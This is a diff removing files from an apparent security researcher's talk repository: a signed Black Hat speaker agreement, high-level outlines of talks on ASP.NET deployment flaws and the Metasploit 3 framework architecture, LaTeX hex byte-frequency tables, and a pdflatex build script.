and optimization, and exploitation prevention technology.
|
||||
|
||||
Transfer of Copyright
|
||||
|
||||
I warrant that the above work has not been previously published elsewhere, or if
|
||||
it has, that I have obtained permission for its publication by Black Hat, Inc.
|
||||
and that I will promptly supply Black Hat, Inc. with wording for crediting the
|
||||
original publication and copyright owner.
|
||||
|
||||
If I am selected for presentation, I hereby give Black Hat, Inc. permission to
|
||||
duplicate, record and redistribute this presentation; including, but not limited
|
||||
to, the conference proceedings, conference CD, video, audio, hand outs(s) to the
|
||||
conference attendees for educational, on-line and all other purposes.
|
||||
|
||||
Yes, I, (insert primary speaker name), have read the above and agree to the
|
||||
Transfer of Copyright.
|
||||
|
||||
Agreement to Terms of Speaking Requirements
|
||||
|
||||
If I am selected to speak, I understand that I must complete and fulfill the
|
||||
following requirements or I will forfeit my honorarium:
|
||||
|
||||
1) I will submit a completed presentation in Powerpoint format for publication
|
||||
in the printed conference proceedings by the date specified in the CFP Letter of
|
||||
Acceptance.
|
||||
|
||||
2) I understand if I fail to submit a completed presentation by the date
|
||||
specified in the CFP Letter of Acceptance, I may be replaced by an alternate
|
||||
presentation or, if allowed to present, will forfeit $250 of my honorarium.
|
||||
|
||||
3) I will submit a completed (and possibly updated) presentation, a copy of the
|
||||
tool(s) and/or code(s), and a reference to all of the tool(s), law(s), Web sites
|
||||
and/or publications referenced to at the end of my talk and as described in this
|
||||
CFP submission for publication on the conference CD by the date specified in the
|
||||
CFP Letter of Acceptance.
|
||||
|
||||
4) I will include a detailed bibliography as either a separate document or
|
||||
included within the presentation of all resources cited and/or used in my
|
||||
presentation.
|
||||
|
||||
5) I will be on hand and accessible to delegates during Black Hat social events
|
||||
including, but not limited to, luncheons and receptions.
|
||||
|
||||
6) I will complete my presentation in the time allocated to me - not ending 15
|
||||
minutes before or running 5 minutes over the time allocation.
|
||||
|
||||
7) I understand that Black Hat will provide 2 lcd projectors, 2 screens,
|
||||
microphone, and video switch box. I understand that I am responsible for
|
||||
providing all other necessary equipment, including laptops and machines, to
|
||||
complete my presentation.
|
||||
|
||||
8) I will submit, within 5 days of the completion of the conference, any
|
||||
updated, revised or additional presentation(s) or materials that were used in my
|
||||
presentation but not included on the conference CD or conference proceedings.
|
||||
|
||||
I, spoonm, have read the above and understand and agree
|
||||
to the terms as detailed in the Agreement to Terms of Speaking Requirements.
|
||||
|
||||
Agreement to Terms of Speaking Remuneration
|
||||
|
||||
1) I understand that Black Hat will only pay for one roundtrip coach class
|
||||
airfare per presentation.
|
||||
|
||||
2) I understand that if I choose to arrange the airfare myself, I must first
|
||||
receive approval from the Conference Administrator or I will not be reimbursed
|
||||
for the airfare. I understand that if I wish to be reimbursed for airfare, I
|
||||
must supply a valid receipt in the form of a travel agency issued air itinerary
|
||||
and/or ticket receipt with the airfare printed on it. I understand that there is
|
||||
a $750 cap for airfare and I will be reimbursed for up to that amount.
|
||||
|
||||
3) I understand that if I choose to travel by automobile I will receive $0.32
|
||||
per mile, roundtrip, as reimbursement. If I travel by rail or bus I will be
|
||||
reimbursed for the cost of the ticket price.
|
||||
|
||||
4) I understand that Black Hat will pay for one hotel room for three nights at
|
||||
the official venue hotel.
|
||||
|
||||
5) I understand that I will be required to provide the hotel with a valid credit
|
||||
card on check in to secure the room and any and all additional costs incurred by
|
||||
me (including but not limited to room service, phone line usage, room internet
|
||||
access, movies, etc) WILL NOT be reimbursed by Black Hat.
|
||||
|
||||
6) I understand that the person listed as the primary speaker will be required
|
||||
to complete a W9 form (only if a US citizen) in order to be paid. Non-US
|
||||
citizens will be paid via wire transfer (or you may choose to be paid with a
|
||||
company check).
|
||||
|
||||
7) I understand that Black Hat will issue one payment per presentation and the
|
||||
check will be issued to the person listed as the primary speaker. Payment will
|
||||
be made net 30 from the end of the conference.
|
||||
|
||||
8) I understand that the name and address on the W9 or wire transfer is where
|
||||
the payment will be sent.
|
||||
|
||||
9) I understand that if I am employed by an official Black Hat sponsor, that I
|
||||
will not receive any compensation for travel, hotel accommodations or an
|
||||
honorarium from Black Hat, Inc.
|
||||
|
||||
10) I understand that should my talk be determined to be a vendor or sales pitch
|
||||
that I will not receive any reimbursement for travel, hotel accommodations or an
|
||||
honorarium.
|
||||
|
||||
11) I understand that should my talk be selected for the "Turbo Talks" I will
|
||||
ONLY receive entrance to the Briefings. As a "Turbo Talks" presenter, I WILL NOT
|
||||
receive a speaking honorarium or compensation for hotel or travel.
|
||||
|
||||
Yes, I, spoonm, have read the above and understand and
|
||||
agree to the terms as detailed in the Agreement to Terms of Speaking
|
||||
Remuneration or I will forfeit my honorarium.
|
|
@ -1,81 +0,0 @@
|
|||
Title:
|
||||
|
||||
Bitten on the ASP
|
||||
|
||||
(How NOT to deploy ASP.NET applications)
|
||||
|
||||
|
||||
Intro:
|
||||
|
||||
Who
|
||||
BreakingPoint
|
||||
Metasploit
|
||||
What
|
||||
ASP.Net deployment issues
|
||||
Default configuration
|
||||
Common configuration flaws
|
||||
Platform problems
|
||||
Why
|
||||
Widely deployed
|
||||
Poorly researched
|
||||
Lack of tools
|
||||
|
||||
Basics
|
||||
|
||||
Global default configuration file
|
||||
Code separated into Applications
|
||||
Applications override configuration file
|
||||
|
||||
Structure
|
||||
Sample web application structure
|
||||
Visual studio files
|
||||
Deploy vs Copy
|
||||
|
||||
IIS Integration
|
||||
Extension vs ASP.Net mappings
|
||||
What files have no mapping?
|
||||
|
||||
Cryptography
|
||||
MAC Key
|
||||
Encryption Key
|
||||
ViewState / Session Generation
|
||||
|
||||
Sessions
|
||||
CookieLess
|
||||
InProcess
|
||||
StateServer
|
||||
Possible flaws
|
||||
SQL Database
|
||||
Field lengths, character data
|
||||
Sliding Sessions...
|
||||
Florida example
|
||||
|
||||
Error Handling
|
||||
Default settings
|
||||
aspxerrorpath tricks
|
||||
Information disclosure
|
||||
|
||||
Forms Authentication
|
||||
?
|
||||
|
||||
ViewState Information
|
||||
Data leak, MAC, etc.
|
||||
|
||||
Debugging
|
||||
Debugging left enabled
|
||||
Tracing left enabled!
|
||||
|
||||
Overview
|
||||
Locking down ASP.Net is not hard
|
||||
Thousands of sites arent doing it
|
||||
Microsoft Terra ServerDopostback/rss.aspx
|
||||
Microsoft Research
|
||||
Summary
|
||||
Vulns
|
||||
Tools
|
||||
Fixes
|
||||
Done
|
||||
|
||||
|
||||
|
||||
IssueTracker.mdb
|
|
@ -1,75 +0,0 @@
|
|||
Title:
|
||||
|
||||
Metasploit^3
|
||||
|
||||
Intro:
|
||||
|
||||
Who
|
||||
BreakingPoint
|
||||
Metasploit
|
||||
What
|
||||
Exploit framework evolution
|
||||
|
||||
Why
|
||||
Exploits are commodities
|
||||
Integration is the tricky part
|
||||
Who needs a shell when...
|
||||
Merge of two distinct users
|
||||
Network admins
|
||||
Penetration testers
|
||||
|
||||
Exploit Frameworks
|
||||
Development platform for exploit code
|
||||
Shrink exploit development time
|
||||
Enable security research
|
||||
Automation
|
||||
|
||||
Metasploit
|
||||
Started off with ~7 exploits
|
||||
v1 - 2,000 lines of perl
|
||||
v2 - 40,000 lines of perl, 3,000 asm, 7,000 C
|
||||
v3 - 80,000 lines of perl, 4,000 asm, 12,000 C
|
||||
Exploit launcher
|
||||
Modular components
|
||||
Consistent interface
|
||||
Three UI's
|
||||
Metasploit^3
|
||||
Complete rewrite in the Ruby language
|
||||
Code compression ~40%
|
||||
Completely OO, no more dirty perl tricks
|
||||
Focused on simplicity, consistency, extensibility
|
||||
|
||||
Architecture
|
||||
Rex Library
|
||||
MSF Library
|
||||
MSF Core
|
||||
MSF Interfaces
|
||||
|
||||
Libraries
|
||||
Create your own MSF app in ~5 lines of code :-)
|
||||
Simple to work with any module programatically
|
||||
Write standalone security apps using our libs
|
||||
|
||||
Concepts
|
||||
Interfaces
|
||||
Load and interact with modules
|
||||
Jobs
|
||||
Modules running in the background
|
||||
Sessions
|
||||
Interactive shells and more
|
||||
Modules
|
||||
Payloads
|
||||
Encoders
|
||||
Nops
|
||||
Exploits
|
||||
Auxiliary
|
||||
|
||||
Plugins
|
||||
Extend anything at runtime
|
||||
|
||||
Examples
|
||||
Reconnaisance module
|
||||
Passive exploit modules
|
||||
Handling multiple sessions
|
||||
|
||||
|
|
@ -1,77 +0,0 @@
|
|||
\definecolor{Hexy110}{rgb}{0.431,0,0.568}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy135}{rgb}{0.529,0,0.470}
|
||||
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
|
||||
\definecolor{Hexy104}{rgb}{0.407,0,0.592}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy102}{rgb}{0.4,0,0.6}
|
||||
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
|
||||
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
|
||||
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy88}{rgb}{0.345,0,0.654}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
|
||||
\definecolor{Hexy103}{rgb}{0.403,0,0.596}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
|
||||
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
|
||||
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
|
||||
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
|
||||
\definecolor{Hexy110}{rgb}{0.431,0,0.568}
|
||||
\definecolor{Hexy86}{rgb}{0.337,0,0.662}
|
||||
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy137}{rgb}{0.537,0,0.462}
|
||||
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
|
||||
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy223}{rgb}{0.874,0,0.125}
|
||||
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
|
||||
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
|
||||
\definecolor{Hexy86}{rgb}{0.337,0,0.662}
|
||||
\definecolor{Hexy130}{rgb}{0.509,0,0.490}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
|
||||
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
|
||||
\definecolor{Hexy105}{rgb}{0.411,0,0.588}
|
||||
\definecolor{Hexy0}{rgb}{0,0,0}
|
||||
\definecolor{HexyGreen}{rgb}{0,.7,0}
|
||||
{\footnotesize
|
||||
\begin{semiverbatim}
|
||||
total: 6000
|
||||
uniq: 52
|
||||
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
|
||||
\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy110}6e \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy118}76
|
||||
\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy135}87 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy106}6a
|
||||
\color{HexyGreen}40 \color{Hexy107}6b \color{Hexy114}72 \color{Hexy106}6a \color{Hexy104}68 \color{Hexy116}74 \color{Hexy102}66 \color{Hexy119}77 \color{Hexy111}6f \color{Hexy109}6d \color{Hexy116}74 \color{Hexy108}6c \color{Hexy119}77 \color{Hexy112}70 \color{Hexy116}74 \color{Hexy88}58 \color{Hexy114}72
|
||||
\color{HexyGreen}50 \color{Hexy106}6a \color{Hexy103}67 \color{Hexy113}71 \color{Hexy112}70 \color{Hexy123}7b \color{Hexy116}74 \color{Hexy118}76 \color{Hexy124}7c \color{Hexy112}70 \color{Hexy124}7c \color{Hexy107}6b \color{Hexy120}78 \color{Hexy0}00 \color{Hexy110}6e \color{Hexy86}56 \color{Hexy100}64
|
||||
\color{HexyGreen}60 \color{Hexy113}71 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy137}89 \color{Hexy108}6c \color{Hexy120}78 \color{Hexy0}00 \color{Hexy116}74 \color{Hexy114}72 \color{Hexy223}df \color{Hexy122}7a \color{Hexy121}79 \color{Hexy0}00 \color{Hexy86}56 \color{Hexy130}82 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy119}77
|
||||
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy124}7c \color{Hexy0}00 00 \color{Hexy113}71 \color{Hexy127}7f \color{Hexy0}00 00 \color{Hexy105}69 \color{Hexy0}00 00 00
|
||||
\end{semiverbatim}
|
||||
}
|
|
@ -1,77 +0,0 @@
|
|||
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
|
||||
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
|
||||
\definecolor{Hexy115}{rgb}{0.450,0,0.549}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy88}{rgb}{0.345,0,0.654}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
|
||||
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
|
||||
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
|
||||
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
|
||||
\definecolor{Hexy126}{rgb}{0.494,0,0.505}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
|
||||
\definecolor{Hexy101}{rgb}{0.396,0,0.603}
|
||||
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
|
||||
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
|
||||
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
|
||||
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
|
||||
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
|
||||
\definecolor{Hexy115}{rgb}{0.450,0,0.549}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
|
||||
\definecolor{Hexy135}{rgb}{0.529,0,0.470}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy232}{rgb}{0.909,0,0.090}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy104}{rgb}{0.407,0,0.592}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy91}{rgb}{0.356,0,0.643}
|
||||
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
|
||||
\definecolor{Hexy87}{rgb}{0.341,0,0.658}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy0}{rgb}{0,0,0}
|
||||
\definecolor{HexyGreen}{rgb}{0,.7,0}
|
||||
{\footnotesize
|
||||
\begin{semiverbatim}
|
||||
total: 6000
|
||||
uniq: 52
|
||||
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
|
||||
\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy100}64 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy111}6f
|
||||
\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy120}78 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy116}74
|
||||
\color{HexyGreen}40 \color{Hexy127}7f \color{Hexy107}6b \color{Hexy111}6f \color{Hexy123}7b \color{Hexy121}79 \color{Hexy114}72 \color{Hexy117}75 \color{Hexy115}73 \color{Hexy118}76 \color{Hexy88}58 \color{Hexy111}6f \color{Hexy122}7a \color{Hexy108}6c \color{Hexy120}78 \color{Hexy122}7a \color{Hexy126}7e
|
||||
\color{HexyGreen}50 \color{Hexy113}71 \color{Hexy109}6d \color{Hexy101}65 \color{Hexy117}75 \color{Hexy127}7f \color{Hexy114}72 \color{Hexy123}7b \color{Hexy114}72 \color{Hexy113}71 \color{Hexy119}77 \color{Hexy109}6d \color{Hexy100}64 \color{Hexy0}00 \color{Hexy113}71 \color{Hexy124}7c \color{Hexy100}64
|
||||
\color{HexyGreen}60 \color{Hexy115}73 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy107}6b \color{Hexy121}79 \color{Hexy135}87 \color{Hexy0}00 \color{Hexy116}74 74 \color{Hexy232}e8 \color{Hexy107}6b \color{Hexy104}68 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy91}5b \color{Hexy0}00 \color{Hexy109}6d \color{Hexy114}72
|
||||
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy117}75 \color{Hexy0}00 00 \color{Hexy87}57 \color{Hexy107}6b \color{Hexy0}00 00 \color{Hexy111}6f \color{Hexy0}00 00 00
|
||||
\end{semiverbatim}
|
||||
}
|
|
@ -1,4 +0,0 @@
|
|||
#!/bin/sh
|
||||
for((i = 0; i < 2; i++)); do
|
||||
pdflatex csw05
|
||||
done
|
|
@ -1,166 +0,0 @@
|
|||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
